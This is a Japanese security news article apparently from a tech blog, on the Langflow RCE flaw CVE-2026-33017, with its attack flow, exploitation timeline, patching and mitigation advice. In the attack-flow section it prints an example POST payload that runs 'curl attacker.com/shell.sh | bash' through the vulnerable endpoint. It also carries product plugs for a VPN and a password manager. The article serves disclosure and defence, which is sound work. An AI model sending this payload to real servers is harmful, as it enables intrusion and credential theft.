セキュリティ19分で読める

Langflowに致命的RCE脆弱性——公開20時間で攻撃開始

セキュリティAIサイバー攻撃オープンソース
加木谷 直俊ソース記事を見る

CVSS 9.3、未認証、リモートコード実行(RCE)——脆弱性情報の公開からわずか20時間で実際の攻撃が観測された。 AIパイプライン構築ツール「Langflow」に見つかった致命的な脆弱性 CVE-2026-33017 は、AIツールのセキュリティがいかに脆いかを改めて突きつけています。

48時間以内に6つの異なるIPアドレスから攻撃が確認され、攻撃者はサーバー上のクレデンシャル窃取やサプライチェーン侵害を狙っていました。Langflowを利用している組織は、今すぐパッチ適用を行わなければ、機密データの流出やAIパイプラインの改ざんといった深刻な被害を受けるリスクがあります。

Langflowとは何か

Langflow は、LLM(大規模言語モデル)を活用したアプリケーションをノーコード/ローコードで構築できるオープンソースのビジュアルフレームワークです。GitHub 上で35,000以上のスターを獲得しており、AI開発者の間で急速に普及しています。

Langflowの主な特徴は以下の通りです。

  • ビジュアルエディター: ドラッグ&ドロップでAIパイプラインを構築
  • LLM統合: OpenAI、Anthropic、Google Geminiなど主要なLLMプロバイダーに対応
  • RAG対応: ベクトルデータベースと連携したRAG(検索拡張生成)パイプラインの構築
  • カスタムコンポーネント: Pythonでカスタムノードを作成し、パイプラインに組み込み可能
  • APIエンドポイント: 構築したフローをREST APIとして公開

企業のAI部門やスタートアップがPoCから本番環境まで幅広く活用しており、特にRAGベースの社内AIアシスタントの構築に多く使われています。この普及度の高さが、今回の脆弱性の影響範囲を深刻なものにしています。

CVE-2026-33017 の技術的詳細

脆弱性の概要

CVE-2026-33017は、Langflowの /api/v1/validate/code エンドポイントに存在する**未認証のリモートコード実行(RCE)**脆弱性です。CVSS v3.1 スコアは 9.3(Critical)と評価されており、攻撃の前提条件が極めて低いことを意味します。

この脆弱性の核心は、ユーザーが送信したPythonコードを認証なしでサーバー側の exec() 関数で直接実行してしまう点にあります。本来、このエンドポイントはカスタムコンポーネントのコード検証用として設計されていましたが、入力値のサニタイズが不十分だったため、任意のPythonコードを注入・実行できる状態でした。

攻撃の仕組み

攻撃者は以下の手順でサーバーを掌握できます。

この図は、攻撃者が未認証エンドポイントを通じてRCEを達成し、データ窃取やサプライチェーン侵害に至るまでの攻撃フローを示しています。

CVE-2026-33017の攻撃フロー — 攻撃者が未認証エンドポイントを通じてRCEを達成し、クレデンシャル窃取やサプライチェーン侵害に至る流れ

ステップ1: 偵察 攻撃者はShodan等のスキャンツールでインターネット上に公開されたLangflowインスタンスを探索します。デフォルトポート(7860)で動作しているサーバーが主なターゲットです。

ステップ2: エクスプロイト送信 認証なしで /api/v1/validate/code エンドポイントに対し、悪意のあるPythonコードを含むPOSTリクエストを送信します。リクエストの例は以下のような形式です。

POST /api/v1/validate/code
Content-Type: application/json

{
  "code": "__import__('os').system('curl attacker.com/shell.sh | bash')"
}

ステップ3: コード実行 サーバー側で exec() が呼び出され、攻撃者のPythonコードがそのまま実行されます。サンドボックスやコード検証のメカニズムは事実上存在しませんでした。

ステップ4: 永続化と横展開 攻撃者はリバースシェルを確立し、環境変数からAPIキーやデータベース接続情報を窃取します。さらに、AIパイプラインの定義を改ざんしてバックドアを仕込んだり、内部ネットワークへのラテラルムーブメントを行います。

なぜ深刻度が高いのか

この脆弱性が特に危険な理由は3つあります。

  1. 認証が不要: ユーザー名やパスワード、APIキーなどの認証情報なしに攻撃可能
  2. 攻撃の容易さ: 特殊なツールは不要で、curlコマンド1行で攻撃できる
  3. 影響範囲の広さ: Langflowサーバーが持つすべての権限(LLM APIキー、データベース接続、ファイルシステムアクセス)が奪取される

公開20時間で攻撃開始——タイムラインの詳細

セキュリティ監視企業の報告によると、CVE-2026-33017の脆弱性情報が公開されてから攻撃が観測されるまでの時間はわずか20時間でした。以下が詳細なタイムラインです。

この図は、脆弱性公開から攻撃拡大までのタイムラインと、攻撃に関する主要な統計を示しています。

CVE-2026-33017のタイムライン — 脆弱性公開から20時間で攻撃開始、48時間で6つのIPから攻撃が確認されるまでの時系列と統計

経過時間イベント
T+0時間CVE-2026-33017の脆弱性情報が公開
T+数時間PoC(概念実証コード)がセキュリティコミュニティで共有
T+20時間最初の実際の攻撃を観測
T+24時間複数のハニーポットでスキャン活動を確認
T+48時間6つの異なるIPアドレスから攻撃、複数の攻撃グループが参入
緊急対応Langflow開発チームがv1.4.1パッチを緊急リリース

20時間という攻撃開始までの速さは、近年のCVE悪用トレンドの中でも際立っています。2024年のGoogle Project Zeroの調査では、脆弱性公開から最初の攻撃までの平均時間は約5日でしたが、AIツール関連の脆弱性ではこの期間が急速に短縮されています。

攻撃者は主にアジアと東欧のIPアドレスから活動しており、観測された攻撃パターンには以下のものが含まれていました。

  • 環境変数の窃取: os.environ を使ったAPIキー・シークレットの読み取り
  • リバースシェルの確立: サーバーへの永続的なアクセス権の確保
  • 暗号通貨マイニングスクリプトの配置: サーバーリソースの不正利用
  • AIパイプライン定義の改ざん: サプライチェーン攻撃への布石

AIツールの脆弱性——これは氷山の一角

CVE-2026-33017は、AIツール特有のセキュリティリスクを象徴する事例です。以下の表は、主要なAIツールで発見された脆弱性の比較です。

ツール名CVECVSS脆弱性の種類公開→攻撃影響
LangflowCVE-2026-330179.3未認証RCE20時間クレデンシャル窃取、サプライチェーン侵害
LangChainCVE-2023-293749.8RCE(eval注入)数日任意コード実行
AutoGPTCVE-2024-60919.8サーバーサイドRCE1週間サーバー完全掌握
MLflowCVE-2024-271349.8未認証RCE数日モデルデータ窃取
RayCVE-2023-480229.8認証欠如数週間クラスタ乗っ取り
OllamaCVE-2024-397197.5情報漏洩数日モデル情報の露出

AIツールに共通するセキュリティ上の構造的問題として、以下のパターンが繰り返し観察されています。

1. コード実行機能の安易な公開

AIツールは柔軟性を重視するため、ユーザーがカスタムコード(Python等)を実行できる機能を備えていることが多いです。この機能がAPI経由で認証なしにアクセス可能な場合、RCE脆弱性に直結します。Langflow、LangChain、AutoGPTのいずれもこのパターンに該当します。

2. 急速な開発サイクルとセキュリティレビューの遅れ

AI分野は競争が激しく、新機能のリリースが優先される傾向があります。セキュリティレビューやペネトレーションテストが後回しにされ、本番環境に脆弱なコードが投入されるケースが後を絶ちません。

3. デフォルト設定の甘さ

多くのAIツールは「すぐに使える」ことを重視し、デフォルトで認証を無効にしていたり、全ネットワークインターフェースでリッスンする設定になっています。開発環境での利便性が、本番環境でのセキュリティリスクになっています。

パッチ適用方法と緩和策

即座に実施すべき対応

1. パッチの適用(最優先)

Langflow v1.4.1以降にアップデートしてください。

pip install --upgrade langflow>=1.4.1

Dockerを使用している場合は、イメージを最新バージョンに更新します。

docker pull langflowai/langflow:latest
docker-compose down && docker-compose up -d

2. 脆弱なエンドポイントのブロック

パッチ適用が即座にできない場合は、WAF(Web Application Firewall)やリバースプロキシで /api/v1/validate/code エンドポイントへの外部アクセスをブロックしてください。

Nginx の場合:

location /api/v1/validate/code {
    deny all;
    return 403;
}

3. ネットワークアクセスの制限

Langflowインスタンスがインターネットに直接公開されている場合は、即座にファイアウォールでアクセスを制限し、VPN経由でのみアクセス可能にしてください。NordVPNなどのVPNサービスを活用して、リモートアクセス時のセキュリティを確保することも有効です。

侵害の痕跡(IoC)の確認

すでに攻撃を受けている可能性があるため、以下のチェックを実施してください。

  • アクセスログの確認: /api/v1/validate/code への不審なPOSTリクエストがないか
  • プロセスの確認: 身に覚えのないプロセス(マイニングツール、リバースシェル等)が動作していないか
  • 環境変数の漏洩チェック: LLM APIキーやデータベース接続情報が不正利用されていないか
  • AIパイプラインの整合性: Langflowで定義したフローが改ざんされていないか

長期的なセキュリティ対策

認証・アクセス制御の強化

Langflowの認証機能を有効化し、すべてのエンドポイントに認証を必須にしてください。APIキーやパスワードは1Passwordなどのパスワードマネージャーで安全に管理し、定期的にローテーションすることが重要です。

ネットワークセグメンテーション

AIツールのサーバーを、機密データを扱うネットワークから分離してください。万が一AIツールが侵害されても、被害がAIツール内に限定されるようにします。

監視とアラート

AIツールのAPIアクセスログを継続的に監視し、異常なリクエストパターン(大量のPOSTリクエスト、通常とは異なるIPアドレスからのアクセス等)を検知する仕組みを構築してください。

日本企業への影響と対応

日本でのAIツール導入状況

日本企業でもLangflowをはじめとするオープンソースAIツールの導入が加速しています。特に2025年以降、社内AIアシスタントやRAGシステムの構築にLangflowを採用する企業が増えており、今回の脆弱性は他人事ではありません。

総務省の「AIセキュリティに関するガイドライン(2025年版)」では、AIシステムのセキュリティリスクについて警鐘を鳴らしていますが、具体的な脆弱性管理のプラクティスはまだ十分に浸透していないのが現状です。

JPCERT/CC と IPA の動向

JPCERT/CC(一般社団法人JPCERTコーディネーションセンター)は、CVSSが9.0以上のCritical脆弱性について注意喚起を発出するのが通例です。CVE-2026-33017についても、日本語での注意喚起情報が公開される見込みです。

IPA(情報処理推進機構)の「重要なセキュリティ情報」にも掲載される可能性が高く、日本の組織はこれらの情報を注視すべきです。

日本企業が直面する特有のリスク

  1. サプライチェーンへの影響: 日本の製造業やSI企業では、AIパイプラインが業務システムと密接に連携しているケースがあり、Langflowの侵害がサプライチェーン全体に波及するリスクがあります。

  2. クラウドクレデンシャルの漏洩: LangflowからAWS、Google Cloud、Azureのクレデンシャルが漏洩した場合、クラウド環境全体が侵害される可能性があります。特に日本企業ではクラウドの権限管理が最小権限の原則に従っていないケースも多く、被害が拡大しやすい傾向があります。

  3. 個人情報保護法への抵触: AIパイプラインが個人データを処理している場合、脆弱性を通じた個人情報の漏洩は個人情報保護法の報告義務の対象となります。2022年の改正で導入された漏えい等報告義務により、個人情報保護委員会への報告と本人への通知が必要になります。

日本語環境での確認手順

以下のコマンドで、自社のネットワーク内でLangflowが稼働しているかを確認できます。

# ネットワーク内のLangflowインスタンスを検出
nmap -p 7860 --open 192.168.0.0/16

# Dockerコンテナとして稼働しているか確認
docker ps | grep langflow

# バージョン確認
pip show langflow | grep Version

AIセキュリティの今後——開発者と組織に求められること

CVE-2026-33017の事例は、AIツールのセキュリティに対する意識変革を迫っています。

開発者への提言

AIツールの開発者は、セキュリティ・バイ・デザインの原則を改めて徹底すべきです。特に以下の点は必須です。

  • コード実行機能には必ず認証を実装: どんなに便利な機能でも、認証なしでコード実行を許可してはなりません
  • 入力値のサニタイズ: exec()eval() を使用する場合は、ホワイトリスト方式で許可する操作を厳密に制限する
  • デフォルト設定の安全性: 「セキュアなデフォルト」を原則とし、利便性のためにセキュリティを犠牲にしない
  • セキュリティ監査の定期実施: 外部のセキュリティ専門家によるペネトレーションテストを定期的に実施する

組織への提言

AIツールを導入する組織は、従来のソフトウェアと同等以上のセキュリティ管理を行う必要があります。

  • AIツールの資産管理: 組織内で使用されているAIツールのインベントリを作成し、バージョンと脆弱性情報を継続的に管理する
  • 脆弱性スキャンの対象拡大: 従来のWebアプリケーションやOS だけでなく、AIツールも脆弱性スキャンの対象に含める
  • インシデント対応計画の更新: AIツールの侵害を想定したインシデント対応手順を策定する

まとめ——今すぐ実施すべき3つのアクション

CVE-2026-33017は、AIツールのセキュリティが「後回しにしてはならない課題」であることを明確に示しました。公開からわずか20時間で攻撃が開始されるスピード感は、従来のパッチ管理のタイムライン(数日〜数週間)では対応が間に合わないことを意味しています。

今すぐ実施すべきアクションステップ:

  1. Langflowの棚卸しとパッチ適用: 自社環境でLangflowが稼働しているか確認し、v1.4.1以降に即座にアップデートする。パッチ適用ができない場合は、脆弱なエンドポイントのブロックとネットワークアクセスの制限を実施する

  2. AIツール全般のセキュリティ見直し: Langflowに限らず、LangChain、AutoGPT、MLflow、Ray、Ollamaなど、利用中のAIツールのバージョンと脆弱性情報を確認する。1PasswordでAPIキーやクレデンシャルを安全に管理し、定期ローテーションの仕組みを整える

  3. ネットワークセキュリティの強化: AIツールのサーバーをインターネットから隔離し、VPN(NordVPN等)経由でのアクセスに限定する。WAFの導入やネットワークセグメンテーションの実施で、万が一の侵害時にも被害範囲を最小化する

AIツールの進化は止まりません。しかし、セキュリティを置き去りにした進化は、攻撃者に新たな攻撃面を提供するだけです。CVE-2026-33017を教訓に、「AIツールは信頼できるが、検証は必要」というゼロトラストの姿勢で、AIセキュリティに取り組んでいきましょう。

この記事をシェア

XはてブLinkedIn

セキュリティ」カテゴリの記事

セキュリティ」の記事をもっと見る

関連記事

新着記事